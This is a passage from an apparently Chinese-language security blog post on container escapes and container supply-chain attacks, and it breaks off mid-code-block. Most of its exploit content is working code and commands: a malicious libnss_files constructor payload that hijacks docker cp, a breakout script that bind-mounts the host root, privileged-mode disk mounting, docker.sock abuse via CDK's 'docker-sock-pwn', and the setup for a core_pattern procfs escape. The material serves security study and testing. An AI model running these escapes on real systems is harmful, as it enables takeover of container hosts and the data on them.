        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111535776.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111535776.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111535776.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111535776.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111535776.png-water_print" /></p>
<p>可以看到加载了 <code>libnss_files-2.31.so</code></p>
<h5 id="1322-构建动态链接库">1.3.2.2 构建动态链接库</h5>
<p><code>libnss_*.so</code> 均在 Glibc 中，首先下载 Glibc 库到本地。</p>
<p>首先要注释掉 <code>gccwarn-c = -Wstrict-prototypes -Wold-style-definition</code>，避免加入 payload 后编译失败。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111540158.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111540158.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111540158.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111540158.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111540158.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111540158.png-water_print" /></p>
<p>在 <code>./nss/nss_files</code> 目录下任意源码文件中添加 payload。以 <code>files-service.c</code> 为例。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="c1">// content should be added into nss/nss_files/files-service.c
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="cp">#include</span> <span class="cpf">&lt;sys/types.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;sys/wait.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp"></span>
</span></span><span class="line"><span class="cl"><span class="cp"># 容器内部原始 libnss_files.so.2 文件备份位置
</span></span></span><span class="line"><span class="cl"><span class="cp">#define ORIGINAL_LIBNSS &#34;/original_libnss_files.so.2&#34;
</span></span></span><span class="line"><span class="cl"><span class="cp"># 恶意 libnss_files.so.2 文件位置
</span></span></span><span class="line"><span class="cl"><span class="cp">#define LIBNSS_PATH &#34;/lib/x86_64-linux-gnu/libnss_files.so.2&#34;
</span></span></span><span class="line"><span class="cl"><span class="cp"></span> 
</span></span><span class="line"><span class="cl"><span class="kt">bool</span> <span class="nf">is_priviliged</span><span class="p">();</span>
</span></span><span class="line"><span class="cl"> 
</span></span><span class="line"><span class="cl"><span class="n">__attribute__</span> <span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="kt">void</span> <span class="n">run_at_link</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">     <span class="kt">char</span> <span class="o">*</span> <span class="n">argv_break</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">  <span class="c1">// 判断是否容器外是高权限执行，即 docker-tar
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>     <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">is_priviliged</span><span class="p">())</span>
</span></span><span class="line"><span class="cl">           <span class="k">return</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> 
</span></span><span class="line"><span class="cl">  <span class="c1">// 攻击执行一次即可，用原始的替换备份的库文件
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>  <span class="c1">// 避免后续对环境产生影响
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>     <span class="n">rename</span><span class="p">(</span><span class="n">ORIGINAL_LIBNSS</span><span class="p">,</span> <span class="n">LIBNSS_PATH</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">  
</span></span><span class="line"><span class="cl">    <span class="c1">// 以 docker-tar 运行 /breakout 恶意脚本
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>  	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">fork</span><span class="p">())</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="c1">// Child runs breakout
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>        <span class="n">argv_break</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">strdup</span><span class="p">(</span><span class="s">&#34;/breakout&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="n">argv_break</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="n">execve</span><span class="p">(</span><span class="s">&#34;/breakout&#34;</span><span class="p">,</span> <span class="n">argv_break</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">     <span class="p">}</span>
</span></span><span class="line"><span class="cl">     <span class="k">else</span>
</span></span><span class="line"><span class="cl">        <span class="n">wait</span><span class="p">(</span><span class="nb">NULL</span><span class="p">);</span> <span class="c1">// Wait for child
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> 
</span></span><span class="line"><span class="cl">     <span class="k">return</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">bool</span> <span class="n">is_priviliged</span><span class="p">()</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">     <span class="n">FILE</span> <span class="o">*</span> <span class="n">proc_file</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="s">&#34;/proc/self/exe&#34;</span><span class="p">,</span> <span class="s">&#34;r&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">     <span class="k">if</span> <span class="p">(</span><span class="n">proc_file</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">           <span class="n">fclose</span><span class="p">(</span><span class="n">proc_file</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">           <span class="k">return</span> <span class="nb">false</span><span class="p">;</span> <span class="c1">// can open so /proc exists, not privileged
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>     <span class="p">}</span>
</span></span><span class="line"><span class="cl">     <span class="k">return</span> <span class="nb">true</span><span class="p">;</span> <span class="c1">// we&#39;re running in the context of docker-tar
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="p">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>编译：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># 目录结构：</span>
</span></span><span class="line"><span class="cl">- gnu
</span></span><span class="line"><span class="cl">	- glibc-2.27
</span></span><span class="line"><span class="cl">	- glibc-build
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 安装 bison</span>
</span></span><span class="line"><span class="cl">apt install bison
</span></span><span class="line"><span class="cl"><span class="c1"># 新建 glibc-build 目录</span>
</span></span><span class="line"><span class="cl">mkdir glibc-build
</span></span><span class="line"><span class="cl"><span class="c1"># 要到上级目录进行 config，不然会报错</span>
</span></span><span class="line"><span class="cl">./glibc-2.27/glibc-build/configure --prefix<span class="o">=</span>/usr/
</span></span><span class="line"><span class="cl"><span class="c1"># 编译</span>
</span></span><span class="line"><span class="cl">~/glibc-2.27/glibc-build make
</span></span></code></pre></td></tr></table>
</div>
</div><h5 id="1323-逃逸">1.3.2.3 逃逸</h5>
<p>breakout 文件：</p>
<p>将 procfs 伪文件系统挂载到容器内，将 PID 为 1 的根目录 /proc/1/root 绑定挂载到容器内部即可。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span><span class="lnt">8
</span><span class="lnt">9
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl"><span class="cp">#!/bin/bash
</span></span></span><span class="line"><span class="cl"><span class="cp"></span>
</span></span><span class="line"><span class="cl">umount /host_fs <span class="o">&amp;&amp;</span> rm -rf /host_fs
</span></span><span class="line"><span class="cl">mkdir /host_fs
</span></span><span class="line"><span class="cl"> 
</span></span><span class="line"><span class="cl"> 
</span></span><span class="line"><span class="cl">mount -t proc none /proc     <span class="c1"># mount the host&#39;s procfs over /proc</span>
</span></span><span class="line"><span class="cl"><span class="nb">cd</span> /proc/1/root              <span class="c1"># chdir to host&#39;s root</span>
</span></span><span class="line"><span class="cl">mount --bind . /host_fs      <span class="c1"># mount host root at /host_fs</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>首先创建 victim 容器：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">docker run -itd --name<span class="o">=</span>victim ubuntu
</span></span></code></pre></td></tr></table>
</div>
</div><p>将 breakout 脚本放到 victim 容器根目录。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">docker cp ./breakout victim:/breakout
</span></span></code></pre></td></tr></table>
</div>
</div><p>进入容器，再将 <code>/lib/x86_64-linux-gnu</code> 下的 <code>libnss_files.so.2</code> 符号链接指向库文件移动到容器根目录下并重命名为 <code>original_libnss_files.so.2</code>，可以使用以下命令查看：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">readlink /lib/x86_64-linux-gnu/libnss_files.so.2
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">mv /lib/x86_64-linux-gnu/libnss_files.so.2 /original_libnss_files.so.2
</span></span></code></pre></td></tr></table>
</div>
</div><p>最后将构建好的恶意 <code>libnss_files.so</code> 重命名为 <code>libnss_files.so.2</code>，放到容器内 <code>/lib/x86_64-linux-gnu</code> 下。</p>
<p>模拟用户执行 docker cp 操作：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">docker cp victim:/etc/passwd ./
</span></span></code></pre></td></tr></table>
</div>
</div><p>执行后，漏洞被触发，容器内部已经能看到挂载的 <code>/host_fs</code>，其中的 <code>/etc/hostname</code> 显示的即为宿主机的 <code>hostname</code>。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111706164.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111706164.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111706164.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111706164.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111706164.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111111706164.png-water_print" /></p>
<h2 id="2-针对容器软件供应链的攻击案例">2 针对容器软件供应链的攻击案例</h2>
<p>从用户角度来看，容器镜像在获取途径上，我们将其分为“从公共仓库获取”以及“从私有仓库获取”两种，那么对于从公共仓库获取的镜像，最重要的两个脆弱性问题：一方面是镜像中软件的安全漏洞问题；另一方面是镜像内的挖矿程序、后门程序、病毒、木马等恶意程序。</p>
<h3 id="21-镜像漏洞利用">2.1 镜像漏洞利用</h3>
<p>镜像漏洞利用指的是镜像本身存在漏洞时，使用镜像创建并运行的容器也通常会存在
相同漏洞，攻击者利用镜像中存在的漏洞去攻击容器，往往具有事半功倍的效果。</p>
<p>例如，Alpine 是一个轻量化的 Linux 发行版，基于 musl libc 和 busybox 构建而成。由
于其体积较小，因此以 Alpine 为基础镜像构建软件是非常流行的。但 Alpine 镜像曾曝出一个漏洞：CVE-2019-5021。在 3.3 ~ 3.9 版本的 Alpine 镜像中，root 用户密码被设置为空，攻击者可能在攻入容器后借此提升到容器内部 root 权限。</p>
<p>官方对此的回应是，Alpine 镜像使用 busybox 作为核心工具链，通过 <code>/etc/security</code>
限制了可以登入 root 用户的 tty 设备。除非是用户主动安装 shadow 和 linux-pam 来代替默认工具链，否则这个漏洞并不好利用。</p>
<p>但是，安全防护注重全面性，具有明显的短板效应。假如用户真的出于某种需求替换了默认工具链呢？那么进入容器的攻击者借助此漏洞就能直接获得容器内部 root 权限了。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-dockerfile" data-lang="dockerfile"><span class="line"><span class="cl">FORM alpine:3.5<span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">RUN</span> apk add --no-cache shadow<span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">RUN</span> adduser -S non_root<span class="err">
</span></span></span><span class="line"><span class="cl"><span class="err"></span><span class="k">USER</span><span class="s"> non_root</span><span class="err">
</span></span></span></code></pre></td></tr></table>
</div>
</div><h3 id="22-镜像投毒">2.2 镜像投毒</h3>
<p>镜像投毒是一个宽泛的话题。它指的是攻击者通过某些方式，如上传恶意镜像到公开
仓库、入侵系统后上传镜像到受害者本地仓库，以及修改镜像名称并假冒正常镜像等，欺骗、诱导受害者使用攻击者指定的恶意镜像创建并运行容器，从而实现入侵或利用受害者的主机进行恶意活动的行为。</p>
<p>根据目的不同，常见的镜像投毒有三种类型：投放恶意挖矿镜像、投放恶意后门镜像和投放恶意 exploit 镜像</p>
<h2 id="3-针对容器运行时的攻击">3 针对容器运行时的攻击</h2>
<h3 id="31-不安全配置导致的容器逃逸">3.1 不安全配置导致的容器逃逸</h3>
<p>Docker 已经将容器运行时的 Capabilities 黑名单机制改为如今的默认禁止所有 Capabilities，再以白名单方式赋予容器运行所需的最小权限。截止本文成稿时，Docker 默认赋予容器近 40 项权限中的 14 项：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-go" data-lang="go"><span class="line"><span class="cl"><span class="kd">func</span> <span class="nf">DefaultCapabilities</span><span class="p">()</span> <span class="p">[]</span><span class="kt">string</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="p">[]</span><span class="kt">string</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;CAP_CHOWN&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;CAP_DAC_OVERRIDE&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;CAP_FSETID&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;CAP_FOWNER&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;CAP_MKNOD&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;CAP_NET_RAW&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;CAP_SETGID&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;CAP_SETUID&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;CAP_SETFCAP&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;CAP_SETPCAP&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;CAP_NET_BIND_SERVICE&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;CAP_SYS_CHROOT&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;CAP_KILL&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;CAP_AUDIT_WRITE&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>无论是细粒度权限控制还是其他安全机制，用户都可以通过修改容器环境配置或在运行容器时指定参数来缩小或扩大约束。如果用户为不完全受控的容器提供了某些危险的配置参数，就为攻击者提供了一定程度的逃逸可能性。</p>
<h4 id="311-privileged-特权模式运行容器">3.1.1 privileged 特权模式运行容器</h4>
<p>当操作者执行 <code>docker run --privileged</code> 时，Docker 将允许容器访问宿主机上的所有设备，同时修改 AppArmor 或 SELinux 的配置，使容器拥有与那些直接运行在宿主机上的进程几乎相同的访问权限。</p>
<p>以特权模式和非特权模式创建了两个容器，其中特权容器内部可以看到宿主机上的设备：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121527625.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121527625.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121527625.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121527625.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121527625.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121527625.png-water_print" /></p>
<p>攻击者可以直接在容器内部挂载宿主机磁盘，然后将根目录切换过去：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">mkdir host
</span></span><span class="line"><span class="cl">mount /dev/sda /host
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="32-危险挂载导致的容器逃逸">3.2 危险挂载导致的容器逃逸</h3>
<p>为了方便宿主机与虚拟机进行数据交换，虚拟化解决方案都会提供挂载宿主机目录到虚拟机的功能。容器同样如此。然而，将宿主机上的敏感文件或目录挂载到容器内部 - 当受控容器存在不安全的挂载时，会造成严重的问题。</p>
<h4 id="321-挂载-docker-socket-的情况">3.2.1 挂载 Docker Socket 的情况</h4>
<p>Docker Socket 是 Docker 守护进程监听的 Unix 域套接字，用来与守护进程通信 - 查询信息或下发命令。如果在攻击者可控的容器内挂载了该套接字文件（<code>/var/run/docker.sock</code>），容器逃逸就相当容易了，除非有进一步的权限限制。</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121534968.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121534968.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121534968.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121534968.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121534968.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121534968.png-water_print" /></p>
<p>复现过程：</p>
<ol>
<li>首先创建一个容器并挂载 <code>/var/run/docker.sock</code>；</li>
<li>在该容器内安装 Docker 命令行客户端；</li>
<li>接着使用该客户端通过 Docker Socket 与 Docker 守护进程通信，发送命令创建并运行一个新的容器，将宿主机的根目录挂载到新创建的容器内部；</li>
<li>在新容器内执行 <code>chroot </code>将根目录切换到挂载的宿主机根目录。</li>
</ol>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">docker run -itd --name demo -v /var/run/docker.sock:/var/run/docker.sock ubuntu
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121552144.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121552144.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121552144.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121552144.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121552144.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121552144.png-water_print" /></p>
<p>利用 <a href="https://github.com/cdk-team/CDK/" target="_blank" rel="noopener noreffer">CDK</a> 进行进行检查：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">./cdk run docker-sock-check /var/run/docker.sock
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121554255.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121554255.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121554255.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121554255.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121554255.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121554255.png-water_print" /></p>
<p>命令执行（逃逸）：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">./cdk run docker-sock-pwn &lt;sock_path&gt; &lt;shell_cmd&gt;
</span></span><span class="line"><span class="cl">./cdk run docker-sock-pwn /var/run/docker.sock <span class="s2">&#34;touch /host/tmp/pwn-success&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="322-挂载主机-procfs-的情况">3.2.2 挂载主机 procfs 的情况</h4>
<p>procfs 是一个伪文件系统，它动态反映着系统内进程及其他组件的状态，其中有许多十分敏感重要的文件。因此，将宿主机的 procfs 挂载到不受控的容器中也是十分危险的，尤其是在该容器内默认启用 root 权限，且没有开启 User Namespace 时。</p>
<p>一般来说，我们不会将宿主机的procfs挂载到容器中。然而，有些业务为了实现某些特殊需要，还是会将该文件系统挂载进来。</p>
<p>procfs 中的 <code>/proc/sys/kernel/core_pattern</code> 负责配置进程崩溃时内存转储数据的导出方式。从手册中能获得关于内存转储的详细信息，关键信息如下：</p>
<blockquote>
<p>从 2.6.19 内核版本开始，Linux 支持在<code>/proc/sys/kernel/core_pattern</code>中使用新语法。如果该文件中的首个字符是管道符<code>|</code>，那么该行的剩余内容将被当作用户空间程序或脚本解释并执行。</p>
</blockquote>
<p>因此，可以利用上述机制，在挂载了宿主机 procfs 的容器内实现逃逸。</p>
<p>环境搭建：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">./metarget gadget install docker --version 18.03.1
</span></span><span class="line"><span class="cl">./metarget gadget install k8s --version 1.16.5 --domestic
</span></span><span class="line"><span class="cl">./metarget cnv install mount-host-procfs
</span></span></code></pre></td></tr></table>
</div>
</div><p>执行完成后，K8s 集群内 <code>metarget</code> 命令空间下将会创建一个名为 <code>mount-host-procfs</code> 的 pod。</p>
<p>宿主机的 procfs 在容器内部的挂载路径是 <code>/host-proc</code>。</p>
<p>复现：</p>
<p>执行以下命令进入容器：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">kubectl <span class="nb">exec</span> -it -n metarget mount-host-procfs /bin/bash
</span></span></code></pre></td></tr></table>
</div>
</div><p>在容器中，首先拿到当前容器在宿主机上的绝对路径：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cat /proc/mounts <span class="p">|</span> grep docker
</span></span></code></pre></td></tr></table>
</div>
</div><p>从 <code>workdir</code> 可以得到基础路径，结合背景知识可知当前容器在宿主机上的 <code>merged</code> 目录绝对路径如下：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121630395.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121630395.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121630395.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121630395.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121630395.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/202111121630395.png-water_print" /></p>
<p>向容器内 <code>/host-proc/sys/kernel/core_pattern</code> 内写入以下内容：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
